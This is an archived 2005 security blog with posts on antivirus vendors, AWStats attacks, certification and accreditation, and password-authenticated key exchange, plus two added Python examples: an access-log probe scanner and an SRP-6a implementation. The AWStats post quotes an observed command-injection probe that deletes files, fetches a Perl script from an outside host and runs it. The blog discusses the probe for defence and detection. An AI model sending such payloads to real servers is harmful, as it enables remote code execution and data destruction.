Archive for September 2005

Symantec Virtual Academy

I just attended a session on Better Threat Scanning with Symantec Antivirus version 10 at the Symantec Virtual Academy. They offered people the chance to sign up for free sessions to showcase the virtual classroom. It was a one-hour session, whereas their normal class on this subject would run across three days. Normally each day would have a few hours of lecture in the morning and lab work in the afternoon. The session used Interwise software. I think the last time I used Interwise it created an auto-running item in my systray.

Firefox Disappoints

How many vulnerabilities does a “secure” browser need to have before people realize they were a bit hasty with the bandwagon jumping? I don’t care how many Secunia graphs you use to defend your niche browser. I’m thinking more than a handful of vulnerabilities could be a sign.

Symantec gores sacred security cows of Mozilla and Mac

F-Secure – “We Can’t Protect You”

http://www.f-secure.com/weblog/#00000655

Mikko Hypponen wrote: Bottom line: if your organization is still, in year 2005, accepting incoming executable attachments in email, now might be a good time to rethink your strategy. Because it looks like these guys won’t be stopping any time soon.

Wow, two antivirus companies in one week waving the white flag. I always knew that they couldn’t protect anyone from a new virus, but I never expected them to admit it. At some point about 7 years ago this would have resulted in shocked disillusionment amongst administrators. But nowadays it barely elicits a ripple. I would have expected people to storm the gates of F-Secure demanding a refund. Why pay tens of thousands of dollars in protection money if the anti-virus cartel can’t get the job done?
So we have to participate in a chaotic file-blocking scheme because it doesn’t look like F-Secure will be able to stop these guys any time soon. Soon they’ll just shut down email altogether in the morning from 8am to 10am. That’s when most viruses come through, you know. :)
First they came for the scr files
and I did not speak out
because I did not email scr files.
Then they came for the vbs files
and I did not speak out
because I did not get any vbs files (and I was jealous of everyone else and their loveletter.vbs).
Then they came for the zip files
and I did not speak out
because I could send my zip files via IM file transfer.
Then they came for doc, xls and pdf files
and there was no one left
business was so disrupted everyone just went out to the bar for a pint.
apologies to Pastor Martin Niemöller

You can’t stop a virus

Did you see the October issue of Information Security Magazine? (requires free subscription, or try bugmenot.com)
In it, they have an article, ‘Best Advice’, which is a collection of advice from 24 security “luminaries” such as Mike Nash, Mikko Hypponen, Congressman Tom Davis (!), and Eugene Spafford. The “best advice” of Eva Chen, CEO of Trend Micro, is “you can’t stop a virus.” Well, pack it up, game over. Shut down the billion-dollar antivirus industry. If it can’t stop a virus, what is it good for?
Eva’s explanation of that quote makes even less sense. She says that most enterprise customers have boundary-less, interconnected supply chains running on one global TCP/IP network, and that somehow those interconnections are more important than stopping the virus. It sounds like her only defense against the virus is to shut down the network.
I marvel at the antivirus industry. First you sell yourself on the ability to solve everything, so that computers (at least those running Windows) cannot be considered “secure” without antivirus software. Next, when the myth of antivirus software is broken (that is, it cannot possibly push out virus definitions fast enough to catch every virus), they attempt to sell add-on functionality. What you really need isn’t antivirus. It’s antivirus and a personal firewall and a host-based IDS. Fix your broken antivirus software rather than selling me additional pieces. McAfee, for example, has added some buffer overflow protection into their antivirus product. Why is no one else innovating?
I can’t wait for the correction. E.g. “Eva didn’t really say you can’t stop a virus. Her best advice was really that risk management needs to be multifaceted.”

Awstats exploits

SANS ISC highlighted awstats attacks today in the diary. I’m seeing the same sort of thing. Scans looking for

awstats.pl?configdir=|echo%20;cd%20/tmp;rm%20-rf%20*;killall%20-9%20perl;wget%20http://geocities.com/ventor_team/a.txt;perl%20a.txt;echo%20;rm%20-rf%20a.txt*;echo|

I think that is a 9-month-old awstats vuln. If you’re running it, you should patch it and password-protect the directory it is installed in.
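Decoded, the configdir value in that request reads `|echo ;cd /tmp;rm -rf *;killall -9 perl;wget http://geocities.com/ventor_team/a.txt;perl a.txt;echo ;rm -rf a.txt*;echo|`: it wipes /tmp, kills any running Perl, fetches a Perl script from a free-hosting account, runs it, and deletes the evidence. The leading `|` is what makes it work. awstats.pl built a config-file path from the unvalidated configdir parameter and handed it to Perl’s two-argument open(), which treats a name beginning with `|` as a command to execute (the configdir command-injection bug, CVE-2005-0116, fixed in AWStats 6.3). Here, as an added example that is not part of the original post, is a small Python scanner that pulls the configdir parameter out of Apache combined-format access-log lines, percent-decodes it until it stops changing (so a double-encoded `%257C` is caught as well), and flags any value carrying shell metacharacters. The log lines are constructed for the example: the first carries the probe string quoted above, the addresses are documentation ranges, and the other requests are made up.

```python
"""Flag AWStats 'configdir' command-injection probes in Apache access logs.

Added example, not from the original post. The log lines and addresses below
are constructed for the example."""
import re
from urllib.parse import unquote, urlsplit

# Apache combined log: client ident user [time] "METHOD URI PROTO" status size ...
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<uri>\S+) \S+" (?P<status>\d{3}) (?P<size>\S+)'
)

# A configdir value should only ever be a directory path. A leading or
# trailing "|" makes Perl's two-argument open() run the path as a command,
# and ";", "&", "`" and "$(" chain further commands inside it.
SHELL_META = re.compile(r'[|;&`]|\$\(')

# The probe quoted in the post, as it would appear in a request line.
PROBE = ("configdir=|echo%20;cd%20/tmp;rm%20-rf%20*;killall%20-9%20perl;"
         "wget%20http://geocities.com/ventor_team/a.txt;perl%20a.txt;"
         "echo%20;rm%20-rf%20a.txt*;echo|")

SAMPLE_LOG = [  # constructed lines
    '203.0.113.7 - - [27/Sep/2005:03:12:45 -0400] "GET /cgi-bin/awstats.pl?' + PROBE
    + ' HTTP/1.0" 200 1732 "-" "Mozilla/4.0"',
    # a legitimate report request: configdir absent
    '198.51.100.4 - - [27/Sep/2005:08:01:10 -0400] "GET /cgi-bin/awstats.pl?config=example.org&output=main HTTP/1.1" 200 45120 "-" "Mozilla/5.0"',
    # double-encoded pipe: %257C -> %7C -> |
    '203.0.113.9 - - [27/Sep/2005:03:13:02 -0400] "GET /cgi-bin/awstats.pl?configdir=%257Cid%257C HTTP/1.0" 200 1732 "-" "-"',
    '192.0.2.11 - - [27/Sep/2005:09:30:00 -0400] "GET /index.html HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
]

def parse_line(line):
    """Split one combined-log line into its fields, or return None if it doesn't parse."""
    m = LOG_RE.match(line)
    return m.groupdict() if m else None

def decode_fully(value, rounds=3):
    """Percent-decode until the value stops changing (bounded), to see through double encoding."""
    for _ in range(rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value

def extract_configdir(uri):
    """Return the decoded configdir query parameter, or None if it is absent."""
    for pair in urlsplit(uri).query.split("&"):
        name, _, value = pair.partition("=")
        if name == "configdir":
            return decode_fully(value)
    return None

def classify(line):
    """Return (client_ip, decoded_configdir) when a line looks like an injection probe, else None."""
    rec = parse_line(line)
    if rec is None or "awstats.pl" not in rec["uri"]:
        return None
    cfg = extract_configdir(rec["uri"])
    if cfg is None or not SHELL_META.search(cfg):
        return None
    return rec["ip"], cfg

def scan(lines):
    """All probe hits in an iterable of log lines, in order."""
    return [hit for hit in map(classify, lines) if hit is not None]

if __name__ == "__main__":
    for ip, cfg in scan(SAMPLE_LOG):
        print(f"{ip}: configdir={cfg!r}")
```

Run against a real access log with `scan(open("access_log"))`. The metacharacter test is deliberately on the decoded value, not the raw request line, because the raw line is exactly where `%7C` and `%257C` hide from naive grep rules.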

C & A Security

Certification and Accreditation. Is it the path to security? Does it even purport to be that? I find myself asking that question as I review the site security plan we are putting together where I work. I’m all for best practices. But one best practice is not applicable everywhere. As Jesper Johansson has written, it is a myth that security checklists will protect you.
I liked what Richard Bejtlich said about this:
Millions of dollars and thousands of hours are spent on C&A, and C&A levels are used to assess security. In reality C&A is a 20-year-old paperwork exercise that does not yield improved security. The only real way to measure security is to track the numbers and types of compromise over time, and try to see that number decrease.

Gartner: Move Beyond Passwords

At the Gartner IT Security Summit in London, Ant Allan said that “passwords are no longer adequate, as threats against them increase.”
He seems to advocate multi-factor authentication in spite of the expense of smartcards or SecurID.
In my Advanced Network Security course, the first project has to do with implementing a protocol called PAKE (password-authenticated key exchange). This was proposed last decade. It is a secure method of authenticating with a password where the password is never sent over the wire. Rather, in a Diffie-Hellman-like fashion, the user is able to prove to the server that it knows the password, so an attacker sniffing the logon cannot recover the password from the traffic, and an active attacker learns nothing beyond whether a single online guess was right. Also, the server does not even store the password in a format that is useful if the PDV is stolen. Any two-factor authentication scheme should authenticate both the server and the client, and not be susceptible to man-in-the-middle attacks. This makes PAKE an interesting study, although I’m not sure how well it scales.
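As an added example (not from the post or from the course it mentions), here is SRP-6a, the most widely deployed augmented PAKE, written out end to end in Python so both sides of the exchange are visible. At enrollment the client hands the server a salt and a verifier v = g^x mod N, never the password. At login the client sends A = g^a, the server answers with B = k·v + g^b, both sides derive the same session key from the password-bound exponents, and each proves knowledge of that key (M1, M2) before the other accepts, which is the mutual-authentication property the paragraph above asks for. Someone who steals the server’s (salt, v) table gets nothing they can log in with; they are left with an offline dictionary attack. The 1024-bit MODP group (RFC 2409 group 2), the use of SHA-256 in place of the SHA-1 in the original SRP description, and the user names and passwords are the example’s own choices.

```python
"""SRP-6a, an augmented PAKE, run end to end between a client and a server.

Added example; not from the original post or the course it mentions. Group,
hash choice, user names and passwords are the example's own."""
import hashlib
import secrets

# 1024-bit MODP group from RFC 2409 (group 2), generator 2. Enough for a
# demonstration; use a larger group (RFC 5054 lists 2048-bit and up) for real use.
N = int("".join("""
FFFFFFFF FFFFFFFF C90FDAA2 2168C234 C4C6628B 80DC1CD1 29024E08 8A67CC74
020BBEA6 3B139B22 514A0879 8E3404DD EF9519B3 CD3A431B 302B0A6D F25F1437
4FE1356D 6D51C245 E485B576 625E7EC6 F44C42E9 A637ED6B 0BFF5CB6 F406B7ED
EE386BFB 5A899FA5 AE9F2411 7C4B1FE6 49286651 ECE65381 FFFFFFFF FFFFFFFF
""".split()), 16)
g = 2
NBYTES = (N.bit_length() + 7) // 8

def H(*parts):
    """SHA-256 over ints (fixed-width big-endian) and byte strings; returns an int."""
    h = hashlib.sha256()
    for p in parts:
        h.update(p.to_bytes(NBYTES, "big") if isinstance(p, int) else p)
    return int.from_bytes(h.digest(), "big")

k = H(N, g)  # SRP-6a multiplier: ties the verifier blinding in B to this group

def private_x(salt, username, password):
    """x = H(salt, H(username:password)); known only to the genuine client."""
    return H(salt, hashlib.sha256(f"{username}:{password}".encode()).digest())

def enroll(username, password):
    """Registration: the client gives the server (salt, v = g^x), never the password."""
    salt = secrets.token_bytes(16)
    return salt, pow(g, private_x(salt, username, password), N)

def same(a, b):
    """Constant-time comparison of two 256-bit proof values."""
    return secrets.compare_digest(a.to_bytes(32, "big"), b.to_bytes(32, "big"))

class Server:
    def __init__(self):
        self.users = {}   # username -> (salt, v); no passwords stored
        self.K = None
    def register(self, username, salt, v):
        self.users[username] = (salt, v)
    def challenge(self, username, A):
        """Given the client's A = g^a, answer with (salt, B = k*v + g^b)."""
        if A % N == 0:
            raise ValueError("client public value must not be 0 mod N")
        self.A, (salt, self.v) = A, self.users[username]
        self.b, self.K = secrets.randbelow(N - 2) + 1, None
        self.B = (k * self.v + pow(g, self.b, N)) % N
        return salt, self.B
    def verify(self, M1):
        """Check the client's proof M1; on success return the server's proof M2."""
        u = H(self.A, self.B)
        if u == 0:
            return None
        S = pow(self.A * pow(self.v, u, N), self.b, N)  # = g^(ab + bux)
        K = hashlib.sha256(S.to_bytes(NBYTES, "big")).digest()
        if not same(M1, H(self.A, self.B, K)):
            return None                                  # wrong password: no key, no M2
        self.K = K
        return H(self.A, M1, K)

class Client:
    def __init__(self, username, password):
        self.username, self.password, self.K = username, password, None
    def start(self):
        self.a = secrets.randbelow(N - 2) + 1
        self.A = pow(g, self.a, N)
        return self.username, self.A
    def respond(self, salt, B):
        """Derive the session key from (salt, B) and the password; return proof M1."""
        if B % N == 0:
            raise ValueError("server public value must not be 0 mod N")
        u = H(self.A, B)
        if u == 0:
            raise ValueError("u must not be 0")
        x = private_x(salt, self.username, self.password)
        S = pow((B - k * pow(g, x, N)) % N, self.a + u * x, N)  # = g^(ab + bux)
        self.B, self.K = B, hashlib.sha256(S.to_bytes(NBYTES, "big")).digest()
        self.M1 = H(self.A, B, self.K)
        return self.M1
    def finish(self, M2):
        """Accept the server only if it proved knowledge of the same key."""
        return M2 is not None and same(M2, H(self.A, self.M1, self.K))

def run_login(server, client):
    """One exchange: returns (server_accepted, client_accepted, keys_match)."""
    username, A = client.start()
    salt, B = server.challenge(username, A)
    M2 = server.verify(client.respond(salt, B))
    client_ok = client.finish(M2)
    return M2 is not None, client_ok, client_ok and server.K == client.K

if __name__ == "__main__":
    srv = Server()
    srv.register("alice", *enroll("alice", "correct horse battery"))
    print("right password:", run_login(srv, Client("alice", "correct horse battery")))
    print("wrong password:", run_login(srv, Client("alice", "tr0ub4dor")))
```

Nothing that crosses the wire (A, B, M1, M2) is a function of the password alone, so a sniffer has nothing to crack offline, and a man in the middle who substitutes his own A or B ends up with a key neither proof will verify. The server keeps per-session state in the instance for brevity; a real implementation keys it by session.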

Symantec False Positive

If you’ve got Symantec Antivirus and you’ve got Webroot Spysweeper, then you probably have seen a Backdoor.Graybird detection today. This is a false positive. The files typically detected are in the temp directory and named mc21.tmp or mc22.tmp in my experience.
I have called Symantec support; the next set of virus defs released should solve this problem. The current set of Rapid Release defs do fix this, but I’d rather wait for “certified” definitions.

Gartner: Security Leadership belongs to CxO

http://software.silicon.com/security/0,39024655,39152300,00.htm

IT departments should not be calling the shots on security, according to Jay Heiser, research VP at Gartner Research. Instead, companies need to take a business-oriented, risk-management approach. Stepping back from technical details allows a company’s IT practices to be forward-looking, aligned with the core business, and deliver a better return on investment. Zurich Financial Services halved its IT costs by outsourcing the commodity aspects of IT and security and focusing on policy rather than the technical aspects of the firewall. Heiser says that IT training is not enough anymore; the job of managing IT risk requires a business-school background with a major in risk management.

I would agree that risk management is an important part of computer security. You need to decide what is important, what it would cost if damaged, what it would cost to repair, and what it would cost to protect. That is a business decision, not a techie decision. However, if you remove the decision from the IT department itself, or remove it from the CIO or CSO, then there is a communications gulf that becomes difficult to cross.
It has always been the security tech’s job to explain what the problem is, how it will affect business, and what it will cost to fix. Was I.T. training alone ever enough?
In the same vein, there is an article in SC Magazine that says the next generation of security experts will need to be as business savvy as they are technically knowledgeable: “take your best and brightest security people and teach them more about business rather than worrying about getting them CISSPs and CISMs.”
Soft skills are essential. But that doesn’t mean you can just take a suit and turn him into an Information Security professional. At the same time, unless you want to get relegated to the basement (like I.T. pre-2000), you need to have the interpersonal skills, you need to be able to explain security issues, and you need to be able to communicate with your manager, your director and your CIO and relate why this is important.